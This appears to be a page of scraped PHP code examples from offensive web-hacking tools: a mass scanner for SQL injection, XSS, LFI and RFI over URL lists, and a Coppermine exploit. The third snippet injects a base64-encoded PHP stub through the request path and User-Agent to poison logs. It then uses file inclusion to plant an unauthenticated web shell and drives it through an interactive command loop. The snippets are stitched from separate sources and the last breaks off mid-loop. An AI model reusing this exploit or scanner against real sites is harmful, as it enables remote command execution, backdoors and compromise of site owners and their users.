/**
 * Run every scanner this tool knows about against a single site.
 *
 * Stage order is fixed: the pmapwn() pre-scan first, then SQL injection,
 * XSS, RFI and LFI. Each scanner is handed the site plus the flag value 1;
 * what that flag means is decided by the scanners themselves, which are
 * defined elsewhere in this file. A progress line is printed to stdout
 * before every stage.
 *
 * @param string $site Target passed unchanged to every scanner.
 */
function full($site)
{
    print "[-] Start full scanning mode.\n";
    pmapwn($site, 1);

    // Remaining stages in run order: progress banner => scanner function name.
    $stages = [
        "[-] Start SQL Injection Scan\n" => 'sql',
        "[-] Start XSS Scan\n"           => 'xss',
        "[-] Start RFI Scan\n"           => 'rfi',
        "[-] Start LFI Scan\n"           => 'lfi',
    ];
    foreach ($stages as $banner => $scanner) {
        print $banner;
        $scanner($site, 1);
    }
}
Beispiel #2
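/**
 * Interactive scan menu.
 *
 * Reads two lines from stdin: the test to run (sqli, xss, lfi, rfi, all, or
 * the combined forms sqli&xss / lfi&rfi) and the name of a file under out/
 * that holds one URL per line. Every selected scanner -- sqli(), xss(),
 * lfi(), rfi(), defined elsewhere in this file -- is then run over each URL
 * in the fixed order SQLi, XSS, LFI, RFI. When the file is missing it prints
 * "File doesnt exist!" and returns without scanning.
 *
 * Corrections relative to the earlier version of this function:
 *  - the 'lfi&rfi' option was compared as `trim($what == 'lfi&rfi')` (a
 *    trimmed boolean) instead of `trim($what) == 'lfi&rfi'`, so it never
 *    selected the LFI/RFI stages;
 *  - stdin is opened once; two independent php://stdin handles may each
 *    buffer ahead and swallow the other's line when input is piped, and the
 *    handles were never closed;
 *  - the URL list is read once instead of twice per stage, and the trailing
 *    newline is stripped before urldecode() hands each URL to a scanner;
 *  - an unreadable file no longer reaches count(false).
 */
function scan()
{
    print "\n  Options:\n";
    print "    sqli - SQL Injection\n";
    print "    xss - Cross Site Scripting\n";
    print "    lfi - Local File Inclusion\n";
    print "    rfi - Remote File Inclusion\n";
    print "    all - F**k shit up\n";
    print "     What: ";
    $stdin = fopen("php://stdin", "r");
    $what = trim((string) fgets($stdin));
    print "\n File: ";
    $whatf = trim((string) fgets($stdin));
    fclose($stdin);

    // NOTE(review): $whatf is operator input joined straight onto 'out/'; a
    // name containing '../' reads outside that directory. Tolerable for a
    // local CLI, but wrap it in basename() if this ever takes remote input.
    $listFile = 'out/' . $whatf;
    if (!file_exists($listFile)) {
        print "\nFile doesnt exist!\n";
        return;
    }
    $urls = file($listFile, FILE_IGNORE_NEW_LINES);
    if ($urls === false) {
        print "\nFile could not be read!\n";
        return;
    }

    // Stage table in run order. 'options' lists the menu strings that enable
    // the stage; 'all' enables every stage.
    $stages = [
        ['label' => 'SQL Injection',         'options' => ['sqli', 'sqli&xss'], 'scanner' => 'sqli'],
        ['label' => 'Cross Site Scripting',  'options' => ['xss', 'sqli&xss'],  'scanner' => 'xss'],
        ['label' => 'Local File Inclusion',  'options' => ['lfi', 'lfi&rfi'],   'scanner' => 'lfi'],
        ['label' => 'Remote File Inclusion', 'options' => ['rfi', 'lfi&rfi'],   'scanner' => 'rfi'],
    ];
    foreach ($stages as $stage) {
        if ($what !== 'all' && !in_array($what, $stage['options'], true)) {
            continue;
        }
        print "\n\n - Testing {$stage['label']} for " . count($urls) . " parameters ({$whatf})\n";
        $scanner = $stage['scanner'];
        foreach ($urls as $link) {
            $scanner(urldecode($link));
        }
    }
}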
Beispiel #3
    die;
}
// Target selection from the command line. Both values are read unchecked here;
// whatever usage/argument validation exists lives above this excerpt.
$host = $argv[1];
$path = $argv[2];

// get_info() is defined elsewhere; the three values printed below are
// presumably globals it fills in -- confirm against its definition.
get_info();
print "\n[-] Version..........: {$version}";
print "\n[-] Cookie name......: {$cookie}";
print "\n[-] Path disclosure..: {$path_disc}\n\n";

if (first_time()) {
    // Decoded, this is a one-line PHP stub that writes proof.php next to the
    // target and exits with the marker _LfI_. proof.php in turn echoes
    // '_code_' and passthru()s the base64-decoded value of the Cmd request
    // header. Two things worth knowing before running it:
    //  - every character of the stub is produced by chr(), so the decoded
    //    text holds no spaces or quotes; that is what lets it ride raw in the
    //    request line and the User-Agent header below;
    //  - proof.php performs NO authentication: any client that sends a Cmd
    //    header gets command execution, and nothing here removes the file
    //    afterwards. On an engagement, clean it up and record it.
    $code = base64_decode("PD9waHA7JGY9Zm9wZW4oY2hyKDExMikuY2hyKDExNCkuY2hyKDExMSkuY2hyKDExMSkuY2hyKDEwMikuY2hyKDQ2KS5jaHIoM" . "TEyKS5jaHIoMTA0KS5jaHIoMTEyKSxjaHIoMTE5KSk7ZndyaXRlKCRmLGNocig2MCkuY2hyKDYzKS5jaHIoMTEyKS5jaHIoMT" . "A0KS5jaHIoMTEyKS5jaHIoMzIpLmNocigxMDEpLmNocig5OSkuY2hyKDEwNCkuY2hyKDExMSkuY2hyKDMyKS5jaHIoMzkpLmN" . "ocig5NSkuY2hyKDk5KS5jaHIoMTExKS5jaHIoMTAwKS5jaHIoMTAxKS5jaHIoOTUpLmNocigzOSkuY2hyKDU5KS5jaHIoMzIp" . "LmNocigxMTIpLmNocig5NykuY2hyKDExNSkuY2hyKDExNSkuY2hyKDExNikuY2hyKDEwNCkuY2hyKDExNCkuY2hyKDExNykuY" . "2hyKDQwKS5jaHIoOTgpLmNocig5NykuY2hyKDExNSkuY2hyKDEwMSkuY2hyKDU0KS5jaHIoNTIpLmNocig5NSkuY2hyKDEwMC" . "kuY2hyKDEwMSkuY2hyKDk5KS5jaHIoMTExKS5jaHIoMTAwKS5jaHIoMTAxKS5jaHIoNDApLmNocigzNikuY2hyKDk1KS5jaHI" . "oODMpLmNocig2OSkuY2hyKDgyKS5jaHIoODYpLmNocig2OSkuY2hyKDgyKS5jaHIoOTEpLmNocigzOSkuY2hyKDcyKS5jaHIo" . "ODQpLmNocig4NCkuY2hyKDgwKS5jaHIoOTUpLmNocig2NykuY2hyKDc3KS5jaHIoNjgpLmNocigzOSkuY2hyKDkzKS5jaHIoN" . "DEpLmNocig0MSkuY2hyKDU5KS5jaHIoMzIpLmNocig2MykuY2hyKDYyKSk7ZmNsb3NlKCRmKTtkaWUoX0xmSV8pOz8+");

    // The stub is planted twice in one request -- in the path and in the
    // User-Agent -- so it lands in the web server's log; lfi() (defined
    // elsewhere) presumably includes that log through the target's file
    // inclusion bug and looks for the _LfI_ marker. Confirm against lfi().
    $headers = [
        "GET {$path}{$code} HTTP/1.0",
        "Host: {$host}",
        "User-Agent: {$code}",
        "Connection: close",
    ];
    $packet = implode("\r\n", $headers) . "\r\n\r\n";
    http_send($host, $packet);
    if (!lfi()) {
        die("\n[-] Exploit failed...\n");
    }
}
while (1) {
    print "\ncoppermine-shell# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit") {
        $packet = "GET {$path}proof.php HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Cmd: " . base64_encode($cmd) . "\r\n";
        $packet .= "Connection: close\r\n\r\n";
        list($header, $payload) = explode("_code_", http_send($host, $packet));
        preg_match("/200 OK/", $header) ? print "\n{$payload}" : die("\n[-] Exploit failed...\n");
    } else {
        break;